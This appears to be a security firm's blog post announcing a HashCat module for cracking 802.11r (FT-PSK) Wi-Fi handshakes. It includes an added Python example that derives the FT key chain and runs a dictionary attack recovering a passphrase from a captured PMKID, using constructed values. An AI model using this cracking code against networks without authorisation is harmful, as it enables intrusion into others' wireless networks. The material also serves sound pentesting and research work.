
Bruteforcing WPA 802.11r: a new module for HashCat


If you’re involved in pentesting wireless networks, you’ve probably encountered infrastructures based on 802.11r (Fast BSS Transition), a fast-roaming standard that is widely deployed in corporate networks, industrial sites, warehouses and similar environments. The problem: until recently, neither HashCat nor John the Ripper supported the handshake and PMKID hashes such networks produce.

The only working option that existed until recently was a single-threaded Python script, which handled only EAPOL handshakes and could not work with PMKID. That was better than nothing: it served as a PoC and for dictionary attacks with a few thousand candidate passwords. Serious GPU-accelerated password cracking, however, was not possible.

The reason is that the cryptographic scheme in 802.11r differs from classic WPA-PSK. The PMK is computed the same way, via PBKDF2-HMAC-SHA1 over the passphrase and SSID, but it is then run through a chain of three HMAC-SHA256 based derivations (PMK-R0, PMK-R1 and finally the PTK) that has no counterpart in plain WPA2-PSK, and the EAPOL-Key MIC at the end is an AES-128-CMAC rather than HMAC-SHA1 or HMAC-MD5. All of this mixes in additional parameters (MDID, R0KH-ID, R1KH-ID) that are specific to a particular wireless network, so a cracker has to carry them alongside the captured hash.
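To make the chain concrete, here is an added Python example that reimplements the FT-PSK key hierarchy from the 802.11 key-hierarchy definitions and runs a dictionary attack against a captured PMKID, which for FT is the PMKR1Name. This is example code written for this page, not hashcat's module and not from the original post. The SSID, MDID, R0KH-ID, MAC addresses, passphrase and wordlist are all constructed. R0KH-ID is the value the AP advertises in its FT element, R1KH-ID is the BSSID, and S0KH-ID/S1KH-ID are the station MAC. The final EAPOL-Key MIC (AES-128-CMAC over the frame, keyed with the KCK) is not computed because it needs an AES implementation outside the standard library; the KCK it would use is derived as the third HMAC-SHA256 step.

```python
"""802.11r FT-PSK key hierarchy and a PMKID (PMKR1Name) dictionary attack.

Added example: a stand-alone reimplementation of the 802.11 FT key
derivations using only the standard library. It is not hashcat's code.
All inputs below (SSID, MDID, R0KH-ID, MAC addresses, passphrase,
wordlist) are constructed for the demonstration.
"""
import hashlib
import hmac
import struct


def kdf_sha256(key: bytes, label: bytes, context: bytes, length_bits: int) -> bytes:
    """802.11 KDF-Hash-Length with HMAC-SHA256.

    Concatenates HMAC(K, i || label || context || Length) for
    i = 1..ceil(Length/256), with i and Length encoded as 16-bit
    little-endian integers, then truncates to Length bits.
    """
    out = b""
    for i in range(1, (length_bits + 255) // 256 + 1):
        msg = struct.pack("<H", i) + label + context + struct.pack("<H", length_bits)
        out += hmac.new(key, msg, hashlib.sha256).digest()
    return out[: length_bits // 8]


def wpa_pmk(passphrase: str, ssid: bytes) -> bytes:
    """Step 0: identical to WPA2-PSK. For FT-PSK this PMK is the XXKey."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def ft_pmk_r0(pmk: bytes, ssid: bytes, mdid: bytes, r0kh_id: bytes, sta: bytes):
    """Step 1: PMK-R0 (256 bits) plus the 128-bit PMK-R0Name-Salt, then PMKR0Name."""
    context = bytes([len(ssid)]) + ssid + mdid + bytes([len(r0kh_id)]) + r0kh_id + sta
    r0_key_data = kdf_sha256(pmk, b"FT-R0", context, 384)  # two HMAC-SHA256 blocks
    pmk_r0, salt = r0_key_data[:32], r0_key_data[32:]
    pmkr0name = hashlib.sha256(b"FT-R0N" + salt).digest()[:16]
    return pmk_r0, pmkr0name


def ft_pmk_r1(pmk_r0: bytes, pmkr0name: bytes, r1kh_id: bytes, sta: bytes):
    """Step 2: PMK-R1 bound to the R1KH (the BSSID) and the station.
    PMKR1Name is what shows up as the PMKID in the FT handshake."""
    pmk_r1 = kdf_sha256(pmk_r0, b"FT-R1", r1kh_id + sta, 256)
    pmkr1name = hashlib.sha256(b"FT-R1N" + pmkr0name + r1kh_id + sta).digest()[:16]
    return pmk_r1, pmkr1name


def ft_ptk(pmk_r1: bytes, snonce: bytes, anonce: bytes, bssid: bytes, sta: bytes) -> bytes:
    """Step 3: PTK = KCK(128) || KEK(128) || TK(128) for FT-PSK with CCMP.
    The EAPOL-Key MIC would be AES-128-CMAC(KCK, EAPOL frame); not computed here."""
    return kdf_sha256(pmk_r1, b"FT-PTK", snonce + anonce + bssid + sta, 384)


def ft_psk_pmkid(passphrase, ssid, mdid, r0kh_id, bssid, sta) -> bytes:
    """Passphrase -> PMKR1Name, the value a PMKID attack compares against."""
    pmk_r0, pmkr0name = ft_pmk_r0(wpa_pmk(passphrase, ssid), ssid, mdid, r0kh_id, sta)
    return ft_pmk_r1(pmk_r0, pmkr0name, bssid, sta)[1]


def crack_pmkid(captured_pmkid, wordlist, ssid, mdid, r0kh_id, bssid, sta):
    """Dictionary attack: recompute PMKR1Name per candidate and compare."""
    for candidate in wordlist:
        if ft_psk_pmkid(candidate, ssid, mdid, r0kh_id, bssid, sta) == captured_pmkid:
            return candidate
    return None


# Constructed network parameters (hypothetical values, not from a real capture).
SSID = b"corp-roaming"
MDID = b"\x12\x34"                     # 2-byte Mobility Domain ID from the MDE
R0KH_ID = b"wlc01.corp.example"        # R0KH-ID (NAS identifier) from the FTE
BSSID = bytes.fromhex("001122334455")  # AP MAC, which is also the R1KH-ID
STA = bytes.fromhex("0a1b2c3d4e5f")    # client MAC, which is S0KH-ID and S1KH-ID


def demo():
    """Build a 'captured' PMKID from the real passphrase, then recover it."""
    captured = ft_psk_pmkid("Spring2024!", SSID, MDID, R0KH_ID, BSSID, STA)
    wordlist = ["password", "Summer2023", "corp-roaming", "Spring2024!", "letmein"]
    return crack_pmkid(captured, wordlist, SSID, MDID, R0KH_ID, BSSID, STA)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The per-candidate cost is the PBKDF2 step (4096 HMAC-SHA1 iterations), exactly as in WPA2-PSK; the three KDF steps add only a handful of HMAC-SHA256 calls, which is why the FT-specific parameters (MDID, R0KH-ID, BSSID, station MAC) matter for correctness rather than for speed and must be recorded together with the PMKID.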

This is exactly what our experts had to implement when they encountered 802.11r in one of our security assessment projects. The result is a new HashCat module supporting both FT-PSK hash types, PMKID and EAPOL: https://github.com/hashcat/hashcat/pull/4645

So, if you encounter a network with 802.11r on your next pentest, you no longer need to settle for a single-threaded script. Feed the captured hashes to HashCat and move forward!
